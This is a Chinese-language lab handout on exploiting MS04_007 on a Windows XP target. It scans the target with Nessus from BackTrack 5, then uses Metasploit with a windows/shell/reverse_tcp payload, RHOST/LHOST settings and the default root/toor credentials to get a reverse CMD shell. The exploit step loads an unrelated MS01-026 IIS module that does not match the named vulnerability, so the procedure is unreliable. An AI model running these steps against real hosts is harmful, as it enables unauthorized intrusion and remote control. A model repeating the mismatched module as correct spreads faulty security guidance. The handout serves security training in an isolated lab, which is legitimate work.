课程编写

类别

内容

实验课题名称

利用MS04_007系统漏洞攻击

实验目的与要求

掌握Metasploit的常用方法

实验环境

软件描述

1nessus

2metasploit

实验环境描述

1、渗透机Bt5

2、靶机windows xp

预备知识

Metasploit Framework (MSF)2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。

实验内容

1.使用nessus扫描目标主机漏洞

2.漏洞利用

3.提权

实验步骤

1、 学生单击实验拓扑按钮,进入实验场景,进入目标主机,(第一次启动目标主机,还需要安装java空间),如

图所示:

2、打开目标主机bt5,进入如下命令行模式,输入用户名:root,密码:toor,然后输入startx进入图形界面。

新手我们建议进入图形界面进行相应的操作。如图所示:

 

3、进入图形化界面后,可以看到BackTrack的整个界面,如图所示:

 

4、打开terminal,输入Firefox https://localhost:8834打开nessus 扫描工具。

5.输入用户名root,密码toor登录nessus页面。

6.新建扫描(New Scan

7.设置扫描参数,如:name:扫描名称

                    Type:扫描类型,Run NowTemplatescheduled

                    Scan targets :扫描目标靶机。

然后进行扫描。

8、扫描statusrunning

9.扫描完成后,查看系统漏洞情况,其中存在MS04_007漏洞。

10.简单查看ms04_007漏洞信息。

11.使用工具metasploit针对ms04_007进行攻击。

MSFConsole是最有效率、最有能力、多合一的接口之一,方便渗透测试者更好地利用漏洞利用程序框架。在terminal终端上输入msfconsole打开metasploit工具,如图所示:

12.使用命令search ms04_007查看该漏洞使用的exploit模块,如图:

13.使用模块use exploit/windows/iis/ms01_026_dbldecode,然后使用show options查看设置参数。

15.设置RHOST 192.168.1.173 payload windows/shell/reverse_tcp如图:

16.设置LHOST 192.168.1.174

17. 接下来进行漏洞利用,会看到ip 192.168.1.173反弹连接到了我们本地的4444端口了,并且还是拥有CMD权限。如图所示。

18.使用ipconfig命令,可以查看到已经渗透到192.168.1.173靶机上。

19、实验完毕,关闭虚拟机和所有窗口。